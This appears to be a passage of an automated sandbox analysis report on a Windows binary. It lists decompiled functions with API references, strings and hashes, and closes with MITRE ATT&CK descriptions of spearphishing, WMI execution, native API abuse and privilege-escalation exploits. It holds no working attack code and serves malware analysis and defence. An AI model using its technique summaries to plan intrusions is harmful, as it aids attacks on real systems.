Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: 3d0d71b4a9fdb423627d60bb05a899915990da00d308a0dc3864841c393e6f55
Instruction ID: 8837efef20a4c58fbc5e3a58520a72e5e950f6bf6dbf99ae94e7bf77a8ccd1a0
Opcode Fuzzy Hash: 3d0d71b4a9fdb423627d60bb05a899915990da00d308a0dc3864841c393e6f55
Instruction Fuzzy Hash: 8B219132615A8082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: 74f2e57537486d01f771eadd42b26db3ec567f089cb9e56e28f736706f318977
Instruction ID: 95b04d34fd7b7026c49ba3f39605e61472826972605ea62b5e493cf059d4225c
Opcode Fuzzy Hash: 74f2e57537486d01f771eadd42b26db3ec567f089cb9e56e28f736706f318977
Instruction Fuzzy Hash: 9D219132615A9082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9EB7DC985CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544DA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: 15e764317145ba8a7fb8b72692ab67f53e2826a60c280c05d4fe616fa8dcb7aa
Instruction ID: 87a02e866d63d4bef934dccfd88ab42cd6d25feaa45d19db6ea1a8547f6f1c55
Opcode Fuzzy Hash: 15e764317145ba8a7fb8b72692ab67f53e2826a60c280c05d4fe616fa8dcb7aa
Instruction Fuzzy Hash: 96218036615A9082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544E6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: d131cd1103d7b490f4736dfd870a79046cef22998b4fdc0ba7c24fc1713085c3
Instruction ID: 04451c00152b8a60380ae8f828e965d42a33dd53c3f6a4da1aaf658b509db279
Opcode Fuzzy Hash: d131cd1103d7b490f4736dfd870a79046cef22998b4fdc0ba7c24fc1713085c3
Instruction Fuzzy Hash: 5E219132615A8082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544EB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: 47d54bfe22cad9470ae639a95a18bb399aa6804e1c435c916d7f1bc3bab49acf
Instruction ID: 11f4fa6a6d054b25447a5e8b4561a477a1ceb6490595791b70a4cc0c72399170
Opcode Fuzzy Hash: 47d54bfe22cad9470ae639a95a18bb399aa6804e1c435c916d7f1bc3bab49acf
Instruction Fuzzy Hash: 57219132615A9082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B012, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B0C7

Strings

MZ@, xrefs: 000000014001B136
Up, xrefs: 000000014001B140

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: KeyboardLayout
String ID: Up$MZ@
API String ID: 194098044-2530889181
Opcode ID: 89170f3ff00f596b50790e25f3942ee966ae2aaa03cc7837ee4cd3370f24f60e
Instruction ID: a879561d6e83a08483e0ec96df4ad232071159ba5886b6b042dcdc377266d1d5
Opcode Fuzzy Hash: 89170f3ff00f596b50790e25f3942ee966ae2aaa03cc7837ee4cd3370f24f60e
Instruction Fuzzy Hash: C921BA726446918AF7229B26A0147FF3FA0B70E3D8F098001FB854BAF5DB3A8089C750

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B039, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B0C7

Strings

MZ@, xrefs: 000000014001B136
Up, xrefs: 000000014001B140

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: KeyboardLayout
String ID: Up$MZ@
API String ID: 194098044-2530889181
Opcode ID: 14d3431bc53e76dd33fd860d604d1f3099c940da3308e8ca8d95e5e518e45e85
Instruction ID: 71347c1a11bb9f878e50990441527e471f863ce67634311162f375959a317cab
Opcode Fuzzy Hash: 14d3431bc53e76dd33fd860d604d1f3099c940da3308e8ca8d95e5e518e45e85
Instruction Fuzzy Hash: CD21BA326446918AF7329B26A0157FB3FA0B70E3D8F098001FB954BAF5DB3A8084CB10

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B05D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B0C7

Strings

MZ@, xrefs: 000000014001B136
Up, xrefs: 000000014001B140

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: KeyboardLayout
String ID: Up$MZ@
API String ID: 194098044-2530889181
Opcode ID: 605c63f595d35901cdacb532a3b325a56d5ce9490ebd0659c6f1a4bc5f7ce372
Instruction ID: e1b7beb6772228f9204b2212ce59fe08a6a68ada74a2c7ba895f23fc0dadb469
Opcode Fuzzy Hash: 605c63f595d35901cdacb532a3b325a56d5ce9490ebd0659c6f1a4bc5f7ce372
Instruction Fuzzy Hash: 1D21BA326446918AF7329B36A5147FA3FA0B30E3D8F498001FB854BAF5DB3A8085C710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140054536, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: a02998526146843451f2f44f313b3648a924ddf576cdf64acb4f069f9dfd9cc9
Instruction ID: 64002d6fefdc0b6c97c4759af9bc3912821dc4dad987dd8c47c572367fd1397f
Opcode Fuzzy Hash: a02998526146843451f2f44f313b3648a924ddf576cdf64acb4f069f9dfd9cc9
Instruction Fuzzy Hash: 97219F32615A8082EB62CF12F0507DA77A0F78C7E8F544212FB9943BA9DB7DC985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B081, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B0C7

Strings

MZ@, xrefs: 000000014001B136
Up, xrefs: 000000014001B140

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: KeyboardLayout
String ID: Up$MZ@
API String ID: 194098044-2530889181
Opcode ID: f6ed39c529c31c457e93342ca1beb8e6c6725db95fc6ba34abb2126e69a5535c
Instruction ID: bcb70db04c55c17880515e76da7c9eabae2613bd92fab575cd4f62f11c1a1766
Opcode Fuzzy Hash: f6ed39c529c31c457e93342ca1beb8e6c6725db95fc6ba34abb2126e69a5535c
Instruction Fuzzy Hash: 3521AF326446914AF7329B36A5117FE3FA0B70E3D8F498101FB994BAF5DB3A8085C710

Uniqueness

Uniqueness Score: -1.00%

Function 000000014006B0F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014007C120: lstrcmpiW.KERNEL32 ref: 000000014007C156

SetMenu.USER32 ref: 000000014006B14D
DestroyAcceleratorTable.USER32 ref: 000000014006B178

Part of subcall function 000000014007AB30: DestroyAcceleratorTable.USER32 ref: 000000014007AB56
Part of subcall function 000000014007AB30: CreateAcceleratorTableW.USER32 ref: 000000014007AC0F

Strings

Menu does not exist., xrefs: 000000014006B12C

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AcceleratorTable$Destroy$CreateMenulstrcmpi
String ID: Menu does not exist.
API String ID: 4181887075-3388092720
Opcode ID: 7b19d40e7365c54b0069a331a73225f9778c250f7784e71e90345439245e3d68
Instruction ID: a959fd4fc980ffc509ebe7d2e606583ec445b16744e8da5de7f868174898e9a5
Opcode Fuzzy Hash: 7b19d40e7365c54b0069a331a73225f9778c250f7784e71e90345439245e3d68
Instruction Fuzzy Hash: 78210CB5305A4081EA56DB17E8543E963A2B74DFC0F684826EF4E1BB76DF39C4818300

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005460A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: 541b4c50f08e323a021a4f754700379e1c2150621057cf727c2dde5214a22b40
Instruction ID: 93934c26366ccb255cbda80112181d3bfc0c38a6e843d2921c42a222b7e95080
Opcode Fuzzy Hash: 541b4c50f08e323a021a4f754700379e1c2150621057cf727c2dde5214a22b40
Instruction Fuzzy Hash: 02216232615A8096EB62CB12F0007DA67A0F74D7D8F540216FB5D03BB9DB7DC945CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B00B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B0C7
GetKeyboardLayout.USER32 ref: 000000014001B251
IsCharUpperW.USER32 ref: 000000014001B2D7

Part of subcall function 00000001400A6D70: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A6D97

Strings

MZ@, xrefs: 000000014001B136
Up, xrefs: 000000014001B140

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: KeyboardLayout$CharUpper_invalid_parameter_noinfo
String ID: Up$MZ@
API String ID: 991500651-2530889181
Opcode ID: 99a0123ef81d10f7d3571865edfa6498b9d18e75d826b17362c732bf2e8331d9
Instruction ID: 16102bfd6169c08d9ffd9c3fa60d5987e1da30e58a13d1bfefa732123d9facd7
Opcode Fuzzy Hash: 99a0123ef81d10f7d3571865edfa6498b9d18e75d826b17362c732bf2e8331d9
Instruction Fuzzy Hash: 441193726086918AF7269B26A4147FE3BB0F70E7D8F088011FB8547BE5DB3AC185C750

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140005470, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

__RTDynamicCast.LIBCMT ref: 00000001400054CD

Strings

<= ComObject(0x%04hX, 0x%I64X), xrefs: 00000001400054DC
%s[Object]: 0x%p, xrefs: 000000014000548F

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CastDynamic
String ID: <= ComObject(0x%04hX, 0x%I64X)$%s[Object]: 0x%p
API String ID: 3796249952-2079539286
Opcode ID: 0cfe193ec14cb54d141adfe725b2b17fdddff6790fedc225af90be57ad319325
Instruction ID: 12dca68bd3c9b0efa865de88b412115126adeeefee3b0860853389af5e703528
Opcode Fuzzy Hash: 0cfe193ec14cb54d141adfe725b2b17fdddff6790fedc225af90be57ad319325
Instruction Fuzzy Hash: B4118872204B8582EA15CB22E8103DAA7A5F78CBC8F844516FF8C53B78CF38C212C780

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C02AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00000001400C0345

Strings

!, xrefs: 00000001400C0331
sqrt, xrefs: 00000001400C0306

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _handle_error
String ID: !$sqrt
API String ID: 1757819995-799759792
Opcode ID: 36be33b9a843fa4c7b5f72a71a06964e9706ddada4aeb20657430f2c35bb3c9e
Instruction ID: 5da013a3b2cc208e5229d90518f7c4cfa1009cccdb14816a382bde0aac28e957
Opcode Fuzzy Hash: 36be33b9a843fa4c7b5f72a71a06964e9706ddada4aeb20657430f2c35bb3c9e
Instruction Fuzzy Hash: 6411CA72918BC483DE46CF56950035A6661FBDE7E4F104311BB680B7E8DB7CD141DB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004F5B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 000000014004F5D3

Strings

%04d%02d%02d%02d%02d%02d, xrefs: 000000014004F611

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: SystemTime
String ID: %04d%02d%02d%02d%02d%02d
API String ID: 2656138-4847443
Opcode ID: 7dc5cb1ef4f8624ac15fefc7ddcfaf03fd45f9086a35d9e35febe698eb4817f1
Instruction ID: 390f09cb60d62b6b73f3b4ea4f67228e8d1ee9afbcdbe6a5b34daf4d1f640ee4
Opcode Fuzzy Hash: 7dc5cb1ef4f8624ac15fefc7ddcfaf03fd45f9086a35d9e35febe698eb4817f1
Instruction Fuzzy Hash: A6017172518650D6D7959F16E0003BAB6B1F789B61F144311FBAA43AE4E73DC1A0DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400A3498, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00000001400A34A1
_CxxThrowException.LIBVCRUNTIME ref: 00000001400A34B2

Part of subcall function 00000001400A5FD8: RtlPcToFileHeader.KERNEL32 ref: 00000001400A6055
Part of subcall function 00000001400A5FD8: RaiseException.KERNEL32 ref: 00000001400A6094

Strings

Unknown exception, xrefs: 00000001400A34BD

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
String ID: Unknown exception
API String ID: 3561508498-410509341
Opcode ID: 91f43999391f72d0a083d5c63666b37ee58cc89e23bb8b59a5df88601c3f76d5
Instruction ID: e4e6731caf7acc5884f1e6bee6622a14749b05094d5db8db978ed02bc6170a89
Opcode Fuzzy Hash: 91f43999391f72d0a083d5c63666b37ee58cc89e23bb8b59a5df88601c3f76d5
Instruction Fuzzy Hash: 29D09E33614A84A5DE21EB05D8953C96330F3A8388FA05515B34C435B5DF79CA8AD740

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

